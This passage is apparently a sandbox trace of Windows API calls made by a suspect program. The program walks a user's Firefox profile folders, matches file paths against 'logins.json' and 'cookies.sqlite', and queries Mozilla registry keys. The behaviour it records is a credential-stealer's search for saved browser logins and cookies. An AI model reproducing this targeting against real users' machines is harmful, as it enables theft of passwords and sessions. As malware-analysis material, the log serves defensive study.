HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.233] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.233] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0161.233] GetProcessHeap () returned 0x8e0000 [0161.233] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x925780 [0161.233] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.233] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webappsstore.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" [0161.233] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.233] GetProcessHeap () returned 0x8e0000 [0161.233] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.233] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite", lpSrch="logins.json") returned 0x0 [0161.233] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.233] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.233] GetProcessHeap () returned 0x8e0000 [0161.233] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.233] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 0 [0161.233] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0161.233] VirtualQuery (in: lpAddress=0x925600, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.233] GetProcessHeap () returned 0x8e0000 [0161.233] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925600 | out: hHeap=0x8e0000) returned 1 [0161.233] VirtualQuery (in: lpAddress=0x925548, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.234] GetProcessHeap () returned 0x8e0000 [0161.234] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925548 | out: hHeap=0x8e0000) returned 1 [0161.234] VirtualQuery (in: lpAddress=0x925490, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.234] GetProcessHeap () returned 0x8e0000 [0161.234] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925490 | out: hHeap=0x8e0000) returned 1 [0161.234] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0161.234] lstrlenW (lpString="\\") returned 1 [0161.234] GetProcessHeap () returned 0x8e0000 [0161.234] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x9253f8 [0161.234] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0161.234] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0161.234] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0161.234] lstrlenW (lpString="silmbjec.default") returned 16 [0161.234] GetProcessHeap () returned 0x8e0000 [0161.234] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x925490 [0161.234] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0161.234] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.234] VirtualQuery (in: lpAddress=0x9253f8, lpBuffer=0x2df4e0, dwLength=0x1c | out: lpBuffer=0x2df4e0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.234] GetProcessHeap () returned 0x8e0000 [0161.234] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9253f8 | out: hHeap=0x8e0000) returned 1 [0161.234] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpSrch="logins.json") returned 0x0 [0161.234] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpSrch="cookies.sqlite") returned 0x0 [0161.234] VirtualQuery (in: lpAddress=0x925490, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.234] GetProcessHeap () returned 0x8e0000 [0161.234] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925490 | out: hHeap=0x8e0000) returned 1 [0161.234] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="silmbjec.default", cAlternateFileName="SILMBJ~1.DEF")) returned 0 [0161.234] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0161.283] VirtualQuery (in: lpAddress=0x925358, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.283] GetProcessHeap () returned 0x8e0000 [0161.283] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925358 | out: hHeap=0x8e0000) returned 1 [0161.283] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.283] GetProcessHeap () returned 0x8e0000 [0161.283] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.283] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.283] GetProcessHeap () returned 0x8e0000 [0161.283] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0161.283] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.283] lstrlenW (lpString="\\") returned 1 [0161.283] GetProcessHeap () returned 0x8e0000 [0161.283] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x926478 [0161.283] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.283] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.283] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 63 [0161.283] lstrlenW (lpString="Profiles") returned 8 [0161.283] GetProcessHeap () returned 0x8e0000 [0161.283] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x9252c0 [0161.283] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.283] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\", lpString2="Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Profiles" [0161.284] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.284] GetProcessHeap () returned 0x8e0000 [0161.284] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.284] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Profiles", lpSrch="logins.json") returned 0x0 [0161.284] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Profiles", lpSrch="cookies.sqlite") returned 0x0 [0161.284] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.284] GetProcessHeap () returned 0x8e0000 [0161.284] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0161.284] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 1 [0161.284] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.284] lstrlenW (lpString="\\") returned 1 [0161.284] GetProcessHeap () returned 0x8e0000 [0161.284] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x926478 [0161.284] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.284] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.284] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 63 [0161.284] lstrlenW (lpString="profiles.ini") returned 12 [0161.284] GetProcessHeap () returned 0x8e0000 [0161.284] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x98) returned 0x9252c0 [0161.284] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.284] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\", lpString2="profiles.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" [0161.284] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.284] GetProcessHeap () returned 0x8e0000 [0161.284] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.284] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpSrch="logins.json") returned 0x0 [0161.284] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpSrch="cookies.sqlite") returned 0x0 [0161.284] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.284] GetProcessHeap () returned 0x8e0000 [0161.284] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0161.284] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 0 [0161.284] FindClose (in: hFindFile=0x8f9a40 | out: hFindFile=0x8f9a40) returned 1 [0161.285] VirtualQuery (in: lpAddress=0x9263e8, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.285] GetProcessHeap () returned 0x8e0000 [0161.285] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9263e8 | out: hHeap=0x8e0000) returned 1 [0161.285] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.285] GetProcessHeap () returned 0x8e0000 [0161.285] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0161.285] VirtualQuery (in: lpAddress=0x90a830, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.285] GetProcessHeap () returned 0x8e0000 [0161.285] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a830 | out: hHeap=0x8e0000) returned 1 [0161.285] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xa000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.285] GetProcessHeap () returned 0x8e0000 [0161.285] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0161.285] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1f000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.285] GetProcessHeap () returned 0x8e0000 [0161.285] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0161.285] GetProcessHeap () returned 0x8e0000 [0161.285] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x912b80 [0161.285] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x14c) returned 0x0 [0161.285] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x912b80, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0161.285] RegCloseKey (hKey=0x14c) returned 0x0 [0161.285] VirtualQuery (in: lpAddress=0x912b80, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x9000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.285] GetProcessHeap () returned 0x8e0000 [0161.285] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b80 | out: hHeap=0x8e0000) returned 1 [0161.285] VirtualQuery (in: lpAddress=0x90a9f0, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.286] GetProcessHeap () returned 0x8e0000 [0161.286] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a9f0 | out: hHeap=0x8e0000) returned 1 [0161.286] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x1, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0161.286] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0161.286] lstrlenW (lpString="\\") returned 1 [0161.286] GetProcessHeap () returned 0x8e0000 [0161.286] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x4e) returned 0x90b400 [0161.286] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox 25.0" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0") returned="Software\\Mozilla\\Mozilla Firefox 25.0" [0161.286] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\" [0161.286] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0161.286] lstrlenW (lpString="extensions") returned 10 [0161.286] GetProcessHeap () returned 0x8e0000 [0161.286] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x62) returned 0x911b98 [0161.286] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox 25.0\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\" [0161.286] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\", lpString2="extensions" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions" [0161.286] VirtualQuery (in: lpAddress=0x90b400, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x90b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.286] GetProcessHeap () returned 0x8e0000 [0161.286] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90b400 | out: hHeap=0x8e0000) returned 1 [0161.286] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", lpSrch="Firefox") returned="Firefox 25.0\\extensions" [0161.286] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa20 | out: phkResult=0x2dfa20*=0x14c) returned 0x0 [0161.286] RegQueryValueExW (in: hKey=0x14c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa24, lpData=0x0, lpcbData=0x2dfa30*=0x0 | out: lpType=0x2dfa24*=0x0, lpData=0x0, lpcbData=0x2dfa30*=0x0) returned 0x2 [0161.286] RegCloseKey (hKey=0x14c) returned 0x0 [0161.286] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", ulOptions=0x0, samDesired=0x20119, phkResult=0x2df9f8 | out: phkResult=0x2df9f8*=0x0) returned 0x2 [0161.286] GetProcessHeap () returned 0x8e0000 [0161.286] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x912b80 [0161.286] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x14c) returned 0x0 [0161.287] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x912b80, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0161.287] RegCloseKey (hKey=0x14c) returned 0x0 [0161.287] VirtualQuery (in: lpAddress=0x912b80, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x9000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.287] GetProcessHeap () returned 0x8e0000 [0161.287] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b80 | out: hHeap=0x8e0000) returned 1 [0161.287] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xa000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.287] GetProcessHeap () returned 0x8e0000 [0161.287] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0161.287] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x2, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", 